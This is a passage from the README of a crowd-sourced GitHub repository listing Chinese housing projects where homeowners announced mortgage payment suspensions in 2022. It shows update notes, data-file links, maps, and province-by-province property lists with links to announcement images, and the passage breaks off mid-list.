ๅ‡็บง readme ๆ–‡ๆกฃ๏ผŒๅทฒๆ”ฏๆŒ๏ผˆไธŽๆŽจ่๏ผ‰ๆข่กŒ็ผ–่พ‘ๆฅผ็›˜ไฟกๆฏ 4. 20220721๏ผš 1. :rocket: ๅขžๅŠ ไบ†ไธ€ไธชๅŸบไบŽ dotnet ๅฎž็Žฐ็š„ GitHub proxy๏ผŒ่ฏฆ่ง [#953](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/953) 2. 
:sparkles: ๅ‡็บงไบ†ๅœฐๅ›พ๏ผŒๆ˜พ็คบไธญๆ–‡ๆฐดๅฐ๏ผŒๅœจ readme ไธญ็›ดๆŽฅๆŸฅ็œ‹ๅณๅฏ ## ๆ•ฐๆฎๆฆ‚่ฆ ### ็ป“ๆž„ๅŒ–ๆ•ฐๆฎ - [ๆฅผ็›˜ๅœ่ดทๆ•ฐๆฎ(FLAT็‰ˆ)](data/generated/properties-flat.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€้“พๆŽฅ๏ผ‰ - [ๆฅผ็›˜ๅœ่ดทๆ•ฐๆฎ(TREE็‰ˆ)](data/generated/properties-tree.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€้“พๆŽฅ๏ผ‰ - [ๅŸŽๅธ‚ๅœ่ดทๆ•ฐๆฎ](data/generated/cities-for-visualization.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€ๆฅผ็›˜็ปŸ่ฎกๆ•ฐใ€็ป็บฌๅบฆ๏ผ‰ ### ๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ๏ผˆๆต…่‰ฒ๏ผ‰</b></summary> <img src="data/generated/visualization-light-wwm.png" alt="visualization-light"> </details> <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ๏ผˆๆทฑ่‰ฒ๏ผ‰</b></summary> <img src="data/generated/visualization-dark-wwm.png" alt="visualization-dark"> </details> <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅœจ็บฟๅœฐๅ›พ๏ผ</b></summary> ๆˆ‘ไปฌๅšไบ†ไธ€ไธชๅœจ็บฟๅœฐๅ›พ๏ผŒๆฅ่ฎฉไธๆ–นไพฟไฝฟ็”จ GitHub ็š„ๆ™ฎ้€šไบบ็œ‹ๅˆฐ่ฟ™ไบ›ๆ•ฐๆฎใ€‚<br> * ๅŸŸๅ๏ผšhttps://building.lulaolu.com<br> * ไป“ๅบ“๏ผšhttps://github.com/ritajie/incomplete-projects ๆฌข่ฟŽๆฅไธบ่ฟ™ไธชๅœฐๅ›พๅš่ดก็Œฎ๏ผ ![alt text](https://github.com/ritajie/incomplete-projects/blob/master/incomplete_projects/static/img/demo.png?raw=true) </details> ### ๅ…ถไป–ๆ•ฐๆฎๅ…ฌ็คบๅค„ - ~~้กน็›ฎๅ‘่ตทไบบ~~ (่ขซ ban ไบ†๏ผ‰ - ~~[ๆˆ‘ๆฅๆ–‡ๆกฃ](https://www.wolai.com/xutejcDgz9B3aTcrRCjxB1)~~ ๏ผˆ20220717ๅทฒๆ— ๆŸฅ็œ‹ๆƒ้™๏ผ‰ - ~~[Notion ๆ•ฐๆฎๅบ“](https://www.notion.so/21dab14200e2478eb91c49b68d16495f)~~ ( 20220717ๅทฒ่ขซๆถๆ„ๅˆ ้™ค) ## ๅˆ†็œๆ•ฐๆฎ (ๆ€ป่ฎก๏ผšใ€**349+**ใ€‘๏ผŒๆŒ‰ไธ‰็บงๆ‹ผ้Ÿณๅ‡ๅบ๏ผ‰ ### ๅฎ‰ๅพฝ็œ [ 2 ] - **ๅˆ่‚ฅๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰](images/ๅฎ‰ๅพฝ็œ/ๅˆ่‚ฅๅธ‚/ๅˆ่‚ฅๆ’ๅคงไธญๅฟƒๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ๆ–ฏ็‘žๅคงๅŽฆ ### ๅŒ—ไบฌๅธ‚ [ 4 ] - **ๆœ้˜ณๅŒบ๏ผˆ1๏ผ‰๏ผš** [ไธŠไธœ้ƒก๏ผˆๆพœๆ‚ฆๆ™ฏ่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/ๆœ้˜ณๅŒบ/ๆพœๆ‚ฆๆ™ฏ่‹‘.jpeg) - **ๆˆฟๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ](images/ๅŒ—ไบฌๅธ‚/ๆˆฟๅฑฑๅŒบ/_ๅŒ—ไบฌ้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ) - **็Ÿณๆ™ฏๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [็ฆงๆ‚ฆๅญฆๅบœ๏ผˆๆ‚ฆๅˆ›ไฝณ่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/็Ÿณๆ™ฏๅฑฑๅŒบ/็ฆงๆ‚ฆๅญฆๅบœ.jpeg) - **้€šๅทžๅŒบ๏ผˆ1๏ผ‰๏ผš** [็ฆนๆดฒๆœ—ๅปทๆนพ๏ผˆๆœ—ๅปท้›…่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/้€šๅทžๅŒบ/ๅŒ—ไบฌ็ฆนๆดฒๆœ—ๅปทๆนพ.jpeg) ### ้‡ๅบ†ๅธ‚ [ 14 ] - **ๅทดๅ—ๅŒบ๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๆ–ฐๅŸŽๅ››ๆœŸ, [ไธ–่Œ‚ยทๆฑŸๅŸŽ้“ญ่‘—](images/้‡ๅบ†ๅธ‚/ๅทดๅ—ๅŒบ/_ไธ–่Œ‚ยทๆฑŸๅŸŽ้“ญ่‘—) - **็’งๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [็’งๅฑฑๅŒบ่žๅˆ›ๅŸŽ๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/็’งๅฑฑๅŒบ/้‡ๅบ†_็’งๅฑฑ_่žๅˆ›ๅŸŽ.jpg) - **ๅคงๆธกๅฃๅŒบ๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง้บ“ๅฑฑๆน–๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๅคงๆธกๅฃๅŒบ/้‡ๅบ†ๅธ‚ๅคงๆธกๅฃๅŒบๆ’ๅคง้บ“ๅฑฑๆน–ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **้ป”ๆฑŸๅŒบ๏ผˆ2๏ผ‰๏ผš** ๅฏŒๅŠ›้™ขๅฃซๅปถ็…ๅขƒ, ๆ’ๅคงๅ้ƒฝ๏ผˆ7ๆœˆ๏ผ‰ - **ๆฒ™ๅชๅๅŒบ๏ผˆ1๏ผ‰๏ผš** [ไฝณๅ…†ไธšยทๅ‡ค้ธฃๆฐดๅฒธ๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๆฒ™ๅชๅๅŒบ/้‡ๅบ†_ไฝณๅ…†ไธšๅ‡ค้ธฃๆฐดๅฒธ.jpg) - **ไธ‡ๅทžๅŒบ๏ผˆ2๏ผ‰๏ผš** [ๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธ๏ผˆ10ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ไธ‡ๅทžๅŒบ/้‡ๅบ†ๅธ‚ไธ‡ๅทžๅŒบๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด10ๆœˆ1ๆ—ฅ่ตทๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg), ไธ‡่ƒๅŸŽไบŒๆœŸ๏ผˆ12ๆœˆ๏ผ‰ - **ๆธๅŒ—ๅŒบ๏ผˆ5๏ผ‰๏ผš** ่Š™่“‰ๅ…ฌ้ฆ†๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง่ฝจ้“ๆ—ถไปฃไบŒๆœŸ, ่“ๅ…‰ๆœชๆฅๅŸŽ, [่žๅˆ›้šๆบชๆ™“้™ขไธ€ไบŒไธ‰ๆœŸ](images/้‡ๅบ†ๅธ‚/ๆธๅŒ—ๅŒบ/้‡ๅบ†ๅธ‚ๆธๅŒ—ๅŒบ่žๅˆ›้šๆบชๆ™“้™ขๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดท้ข„ๅ‘Šไนฆ.png), [้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๆธๅŒ—ๅŒบ/้˜ณๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ.jpg) ### ็ฆๅปบ็œ [ 4 ] - **็ฆๅทžๅธ‚๏ผˆ4๏ผ‰๏ผš** [ๆ’ๅคงๅคฉ็’ŸไบŒๆœŸ](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/็ฆๅทžๅธ‚ๆ’ๅคงๅคฉ็’ŸไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), 
[ๅนณๆฝญ็ปผๅˆๅฎž้ชŒๅŒบ้‡‘้กบๆ–ฐๅ…‰ๆ˜ŽๅŸŽ๏ผˆ9ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/ๅนณๆฝญ็ปผๅˆๅฎž้ชŒๅŒบ้‡‘้กบๆ–ฐๅ…‰ๆ˜ŽๅŸŽๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ไธ–่Œ‚ๆณฐ็ฆพ้’ไบ‘ๅฐ้•‡๏ผˆ9ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/ๆฐธๆณฐ้’ไบ‘ๅฐ้•‡ๅƒไฝ™ๆˆทไธšไธป่”ๅๅ‘ๅธƒๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ๅคฉๆณฝๅฅฅ่Žฑๆ—ถไปฃ๏ผˆ8ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/็ฆๅทžๅธ‚ๅฅฅ่Žฑๆ—ถไปฃ.jpg) ### ็”˜่‚ƒ็œ [ 2 ] - **ๅ…ฐๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท](images/็”˜่‚ƒ็œ/ๅ…ฐๅทžๅธ‚/ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท.jpeg) - **ๅบ†้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅ›ฝ้‡‘one๏ผˆ11ๆœˆ๏ผ‰ ### ๅนฟไธœ็œ [ 8 ] - **ๅนฟๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ไธ‡็ง‘ๆตทไธŠๆ˜Žๆœˆ๏ผˆ9ๆœˆ๏ผ‰](images/ๅนฟไธœ็œ/ๅนฟๅทžๅธ‚/gz001.png) - **ๆญ้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญไบŒๆœŸ - **ๆฑ•ๅคดๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง้‡‘็ขงๅค–ๆปฉๆนพ๏ผˆๅ…ซๆœˆ๏ผ‰ - **ๆทฑๅœณๅธ‚๏ผˆ3๏ผ‰๏ผš** ไฝณๅ…†ไธšๆ—ถไปฃๅคงๅŽฆ, [ไฝณๅ…†ไธšๆจพไผดๅฑฑ](images/ๅนฟไธœ็œ/ๆทฑๅœณๅธ‚/sz001.jpg), [ๅ‰ๆตทๅคฉๅขƒ่Šฑๅ›ญ](images/ๅนฟไธœ็œ/ๆทฑๅœณๅธ‚/sz003.jpg) - **ๆน›ๆฑŸๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅดๅทๅฅฅๅ›ญๅ† ๅ†›ๅŸŽไธ€ๆœŸ](images/ๅนฟไธœ็œ/ๆน›ๆฑŸๅธ‚/_ๅดๅทๅฅฅๅ›ญๅ† ๅ†›ๅŸŽไธ€ๆœŸ) - **ไธญๅฑฑๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ ### ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ [ 24 ] - **ๅŒ—ๆตทๅธ‚๏ผˆ1๏ผ‰๏ผš** [่žๅˆ›ๆตทๆ˜ ๅ…ฐๅฑฟไธ‰ๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅŒ—ๆตทๅธ‚/ๅนฟ่ฅฟๅŒ—ๆตทๅธ‚่žๅˆ›ๆตทๆ˜ ๅ…ฐๅฑฟไธ‰ๆœŸไธšไธป้›†ไฝ“ไธญๆญข่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅด‡ๅทฆๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅด‡ๅทฆๅธ‚/ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆก‚ๆž—ๅธ‚๏ผˆ7๏ผ‰๏ผš** [ๆก‚ๆž—ๆ’ๅคงๅŸŽ๏ผˆ10ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—ๆ’ๅคงๅŸŽ.jpg), [ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN4ๅœฐๅ—](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/_ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN4ๅœฐๅ—), ็ตๅทๆฑ‡้‡‘ไธ‡่ฑกๆ–ฐๅŸŽ๏ผˆ11ๆœˆ๏ผ‰, [่žๅˆ›ๆ–‡ๆ—…ๅŸŽN5ๅœฐๅ—๏ผˆ12ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN5ๅœฐๅ—ๆฝไบ‘ๅบœ่ฅฟ่‹‘ๅ…จไฝ“ไธšไธปๅผบๅˆถๅปถๆœŸ่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.png), [่žๅˆ›ๆ–‡ๆ—…ๅŸŽN7ๅœฐๅ—๏ผˆ10ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—่žๅˆ›N7.png), [ๅฑฑๆฐดๅ›ฝ้™…](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๅฑฑๆฐดๅ›ฝ้™…ๅ’ŒๅฑฑๆฐดๅŽๅบญๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg), [ๅฑฑๆฐดๅŽๅบญ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๅฑฑๆฐดๅ›ฝ้™…ๅ’ŒๅฑฑๆฐดๅŽๅบญๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg) - **ๆŸณๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆŸณๅทžๅธ‚/ๆŸณๅทžๆ’ๅคงไบŒไธ‰ๆœŸๅœ่ดท.jpg), [้นฟๅฏจๅŽฟ้บ“ๆน–ๅ…ฌๅ›ญ้‡Œ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆŸณๅทžๅธ‚/้นฟๅฏจๅŽฟ้บ“ๆน–ๅ…ฌๅ›ญ้‡Œๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆ20ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg) - **ๅ—ๅฎๅธ‚๏ผˆ9๏ผ‰๏ผš** [ไธœ้ผŽ้›ๅ’Œๅบœ๏ผˆ9ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎไธœ้ผŽ้›ๅ’Œๅบœ.png), ๆฑŸๅฎ‡ไธ–็บชๅ…ฌ้ฆ†, ้‡‘็ง‘ๅš็ฟ ๅฑฑ, ่“ๅ…‰้›้”ฆๆพœๆนพ, [ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸๅ‘Š็Ÿฅไนฆ.png), ่žๅˆ›่žๅ…ฌ้ฆ†11ใ€12ๅทๆฅผ๏ผˆ8ๆœˆ๏ผ‰, [ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎๅธ‚ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘.png), ไบ”่ฑกๆพœๅบญๅบœ่‡ป่‹‘, [ไธญ้ผŽๅ…ฌๅ›ญๅบœ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅนฟ่ฅฟ็œๅ—ๅฎๅธ‚ไธญ้ผŽๅ…ฌๅ›ญๅบœๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **้’ฆๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›ไบŒๆœŸ - **ๆขงๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็ปฟๆดฒไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆขงๅทžๅธ‚/ๆขงๅทžๆ’ๅคงไบŒๆœŸๅœ่ดท.png) - **็Ž‰ๆž—ๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๅŒ—ๆตๅธ‚ไธ‰็Žฏๆ–ฐๅŸŽไบŒๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/็Ž‰ๆž—ๅธ‚/็Ž‰ๆž—ๅŒ—ๆตๅธ‚ไธ‰็Žฏๆ–ฐๅŸŽๅœ่ดท.png), ไธญ้ผŽ็ปฟๅŸŽไธญๅฟƒ ### ่ดตๅทž็œ [ 2 ] - **่ดต้˜ณๅธ‚๏ผˆ2๏ผ‰๏ผš** ไธญ็Žฏๅ›ฝ้™…้˜…ๆน–, 
[ไธญๅคฉยทๅพไนก](images/่ดตๅทž็œ/่ดต้˜ณๅธ‚/_ไธญๅคฉยทๅพไนก) ### ๆฒณๅŒ—็œ [ 24 ] - **ไฟๅฎšๅธ‚๏ผˆ3๏ผ‰๏ผš** [้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ](images/ๆฒณๅŒ—็œ/ไฟๅฎšๅธ‚/้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ้กน็›ฎๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [้š†ๅŸบๆณฐๅ’Œๆถฟๅทž็ดซๆ‚ฆๅฐๅŒบ](images/ๆฒณๅŒ—็œ/ไฟๅฎšๅธ‚/ๆถฟๅทžๅธ‚้š†ๅŸบๆณฐๅ’Œ็ดซๆ‚ฆๅฐๅŒบ.jpeg), ไธŠไธœๅพกๆ™ฏ - **ๆฒงๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [็ดซๆจพ้ฆ™ๆฆญ](images/ๆฒณๅŒ—็œ/ๆฒงๅทžๅธ‚/ๆฒงๅทžๅธ‚็ดซๆจพ้ฆ™ๆฆญๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg) - **ๆ‰ฟๅพทๅธ‚๏ผˆ1๏ผ‰๏ผš** ็Šถๅ…ƒๅบœ - **้‚ฏ้ƒธๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคง็ปฟๆดฒ](images/ๆฒณๅŒ—็œ/้‚ฏ้ƒธๅธ‚/้‚ฏ้ƒธๆ’ๅคง็ปฟๆดฒ.jpg), [ๆ’ๅคงๆ‚ฆ็‘ๆนพ](images/ๆฒณๅŒ—็œ/้‚ฏ้ƒธๅธ‚/้‚ฏ้ƒธๆ’ๅคง.jpg) - **ๅปŠๅŠๅธ‚๏ผˆ5๏ผ‰๏ผš** ้ธฟๅคๅ‡คๅ‡ฐๅŸŽไบ”ๆœŸ๏ผˆ8ๆœˆ๏ผ‰, ้ธฟๅค็†ๆƒณๅŸŽ, [ๅŽๅคๅนธ็ฆยทๅ››ๅญฃๅ…ฌ้ฆ†](images/ๆฒณๅŒ—็œ/ๅปŠๅŠๅธ‚/ๆฒณๅŒ—ๅปŠๅŠๅธ‚ๅคงๅŽ‚ๅ›žๆ—่‡ชๆฒปๅŽฟๅ››ๅญฃๅ…ฌ้ฆ†ๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๅŽๅคๅนธ็ฆๅญ”้›€ๅŸŽๅคง่ฟๆฒณๆ™บๆ…ง่ก—ๅŒบ๏ผˆ้ฆ™ๆฒณ๏ผ‰, ็›ˆๆ—ถยทๆœชๆฅๆธฏ - **็Ÿณๅฎถๅบ„ๅธ‚๏ผˆ7๏ผ‰๏ผš** [ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„ๅธ‚ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœๅ…จไฝ“่ดงๆฌพไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰, ๆ’ๅคงๆ‚ฆ้พ™ๅฐ, ๆ’ๆถฆไธญๅคฎๅนฟๅœบ, [่žๅˆ›ๅŸŽไธ€ๆœŸ๏ผˆ11ๆœˆ๏ผ‰](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„่žๅˆ›ๅŸŽไธ€ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด11ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [็Ÿณๅฎถๅบ„่ตซ็Ÿณๅบœ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„ๅธ‚่ตซ็Ÿณๅบœๅ…จไฝ“่ดงๆฌพไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.png), [ไผ—็พŽๅฎšๅˆถๅนฟๅœบ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/_ไผ—็พŽๅฎšๅˆถๅนฟๅœบ) - **้‚ขๅฐๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆๅบœ, [ๅคฉๅฑฑ็†™ๆน–ไบŒๆœŸ_ๅ็Ž‰ๅฎถๅ›ญ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/ๆฒณๅŒ—็œ/้‚ขๅฐๅธ‚/ๅคฉๅฑฑ็†™ๆน–ไบŒๆœŸ_ๅ็Ž‰ๅฎถๅ›ญๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ๆฐธๅบทไธ‡ๅ›ฝๅŸŽ - **ๅผ ๅฎถๅฃๅธ‚๏ผˆ2๏ผ‰๏ผš** ๅฎฃๅŒ–ๆ’ๅคงๆปจๆฒณๅทฆๅฒธ, ๅฎฃๅŒ–ๆ’ๅคง็ฟก็ฟ ๆนพ ### ๆฒณๅ—็œ [ 70 ] - **ๅฎ‰้˜ณๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/ๅฎ‰้˜ณๅธ‚/_ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ), ๆ’ๅคงๆ‚ฆๅบœ, ็ดซ่–‡ๅ…ฌ้ฆ† - **้นคๅฃๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆท‡ๅŽฟๅปบไธšๅŸŽ](images/ๆฒณๅ—็œ/้นคๅฃๅธ‚/ๆฒณๅ—้นคๅฃๅธ‚ๆท‡ๅŽฟๅปบไธšๅŸŽๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jfif) - **ๅผ€ๅฐๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆไธ€ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆไธ€ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆไปฝๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆด›้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงไบ‘ๆน–ไธŠ้ƒก - **ๆผฏๆฒณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆๅบœ - **ๅ—้˜ณๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคงๅพกๅบœ, ๅ…ด่พพ็‘ๅบœ, ้˜ณๅ…‰ๅŸŽไธฝๆ™ฏ่Šฑๅ›ญ - **ๅ•†ไธ˜ๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๅ้ƒฝไบŒๆœŸ, ๅ้—จๅŸŽไบ”ๆœŸ - **ๆ–ฐไนกๅธ‚๏ผˆ2๏ผ‰๏ผš** ๅนณๅŽŸๆ–ฐๅŒบๆ’ๅคงไธ‰ๆœŸๅŠๅŸŽๆน–๏ผˆ8ๆœˆ๏ผ‰, [ๆ–ฐไนกๅธ‚่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ๏ผˆ8ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/ๆ–ฐไนกๅธ‚/ๆ–ฐไนก่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ.jpg) - 